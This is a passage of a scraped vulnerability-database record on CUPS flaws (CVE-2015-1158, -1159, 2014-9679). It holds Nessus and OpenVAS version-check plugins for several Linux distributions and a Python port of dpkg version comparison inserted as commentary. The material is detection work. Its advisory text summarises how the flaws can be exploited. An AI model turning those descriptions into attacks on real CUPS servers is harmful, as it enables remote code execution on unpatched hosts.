script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
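The deb_check() calls in the Debian plugin earlier on this page and the ubuntu_check() calls in this plugin flag a host when the installed package sorts below the reference version (`1.4.4-7+squeeze8`, `1.7.2-0ubuntu1.6` and so on) under dpkg's ordering rules, not under a plain string comparison. As an added example that is not Tenable's code, the Python below ports that ordering (epoch first, then upstream version, then Debian revision, with `~` sorting before anything including the end of the string, letters before other characters, and digit runs compared by value) and applies it to a constructed `dpkg -l` excerpt. The installed versions in that excerpt and the helper names are assumptions for illustration; the reference versions are the ones the Debian plugin checks.

```python
import re

# Reference versions copied from the Debian plugin's deb_check() calls.
FIXED_SQUEEZE = {
    "cups": "1.4.4-7+squeeze8",
    "cups-client": "1.4.4-7+squeeze8",
    "libcups2": "1.4.4-7+squeeze8",
    "libcups2-dev": "1.4.4-7+squeeze8",
}

# Constructed 'dpkg -l' excerpt (assumption: not from a real host).
SAMPLE_DPKG_L = """\
ii  cups           1.4.4-7+squeeze7   Common UNIX Printing System(tm) - server
ii  cups-client    1.4.4-7+squeeze8   Common UNIX Printing System(tm) - client programs
ii  libcups2       1.4.4-7+squeeze7   Common UNIX Printing System(tm) - libs
ii  libcups2-dev   1.4.4-7+squeeze8   Common UNIX Printing System(tm) - development files
rc  cups-bsd       1.4.4-7+squeeze5   Common UNIX Printing System(tm) - BSD commands
"""


def _isdigit(c: str) -> bool:
    return "0" <= c <= "9"


def _order(c: str) -> int:
    """dpkg's weight for one character of a non-digit run: digits and end of
    string are 0, '~' sorts below that, letters by ASCII, everything else above."""
    if c == "" or _isdigit(c):
        return 0
    if c == "~":
        return -1
    if c.isalpha():
        return ord(c)
    return ord(c) + 256


def _verrevcmp(a: str, b: str) -> int:
    """Port of dpkg's verrevcmp(): alternate non-digit runs (by _order) and
    digit runs (numerically, leading zeros dropped)."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        while (i < len(a) and not _isdigit(a[i])) or (j < len(b) and not _isdigit(b[j])):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        while i < len(a) and j < len(b) and _isdigit(a[i]) and _isdigit(b[j]):
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and _isdigit(a[i]):
            return 1      # a has more digits in this run
        if j < len(b) and _isdigit(b[j]):
            return -1
        if first_diff:
            return first_diff
    return 0


def _split(version: str):
    """'epoch:upstream-revision' -> (epoch, upstream, revision); epoch defaults
    to 0 and the revision (everything after the last '-') to ''."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:
        upstream, revision = revision, ""
    return epoch, upstream, revision


def dpkg_compare(v1: str, v2: str) -> int:
    """-1, 0 or 1 as v1 sorts before, equal to or after v2."""
    e1, u1, r1 = _split(v1)
    e2, u2, r2 = _split(v2)
    if e1 != e2:
        return -1 if e1 < e2 else 1
    for x, y in ((u1, u2), (r1, r2)):
        c = _verrevcmp(x, y)
        if c:
            return -1 if c < 0 else 1
    return 0


_DPKG_LINE = re.compile(r"^ii\s+(\S+?)(?::\S+)?\s+(\S+)")


def dpkg_missing_fix(dpkg_l: str, fixed: dict) -> list:
    """Installed ('ii') packages whose version sorts below the fixed one;
    'rc' rows (removed, config left behind) are not installed and are ignored."""
    flagged = []
    for line in dpkg_l.splitlines():
        m = _DPKG_LINE.match(line)
        if not m:
            continue
        name, installed = m.group(1), m.group(2)
        if name in fixed and dpkg_compare(installed, fixed[name]) < 0:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    for pkg in dpkg_missing_fix(SAMPLE_DPKG_L, FIXED_SQUEEZE):
        print(f"{pkg}: installed build is older than {FIXED_SQUEEZE[pkg]}")
```

`1.4.4-7+squeeze10` correctly sorts after `squeeze8` and `1.0~rc1` before `1.0`, which a string comparison gets wrong in both cases; that is the whole reason the plugins lean on the package manager's ordering rather than on the banner.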
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"cups\", pkgver:\"1.5.3-0ubuntu8.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"cups\", pkgver:\"1.7.2-0ubuntu1.6\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"cups\", pkgver:\"1.7.5-3ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"cups\", pkgver:\"2.0.2-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:38", "bulletinFamily": "scanner", "cvelist": 
["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "Check the version of cups", "modified": "2019-03-08T00:00:00", "published": "2015-06-19T00:00:00", "id": "OPENVAS:1361412562310882201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882201", "type": "openvas", "title": "CentOS Update for cups CESA-2015:1123 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2015:1123 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882201\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-19 06:18:15 +0200 (Fri, 19 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for cups CESA-2015:1123 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of cups\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CUPS provides a portable printing layer for\n Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. 
An\nattacker could use this flaw to bypass the default configuration settings\nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and\nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"cups on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1123\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", 
rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-ipptool\", rpm:\"cups-ipptool~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:59:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120032", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-559)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120032\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:15:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-559)\");\n script_tag(name:\"insight\", value:\"A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158 )A cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159 )An integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially-crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash. 
(CVE-2014-9679 )\");\n script_tag(name:\"solution\", value:\"Run yum update cups to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-559.html\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\", \"CVE-2014-9679\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n 
exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-06-18T00:00:00", "id": "OPENVAS:1361412562310871377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871377", "type": "openvas", "title": "RedHat Update for cups RHSA-2015:1123-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for cups RHSA-2015:1123-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871377\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-18 06:12:04 +0200 (Thu, 18 Jun 2015)\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for cups RHSA-2015:1123-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. 
An\nattacker could use this flaw to bypass the default configuration settings\nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and\nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"cups on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1123-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-June/msg00021.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", 
rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", 
"CVE-2015-1159"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-06-21T00:00:00", "id": "OPENVAS:1361412562310869456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869456", "type": "openvas", "title": "Fedora Update for cups FEDORA-2015-9801", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2015-9801\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-21 05:54:54 +0200 (Sun, 21 Jun 2015)\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\", \"CVE-2014-9679\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for cups FEDORA-2015-9801\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"cups on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9801\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160577.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.7.5~17.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "Oracle Linux Local Security Checks ELSA-2015-1123", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123098", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123098", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1123", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1123.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123098\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:21 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1123\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1123 - cups security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks 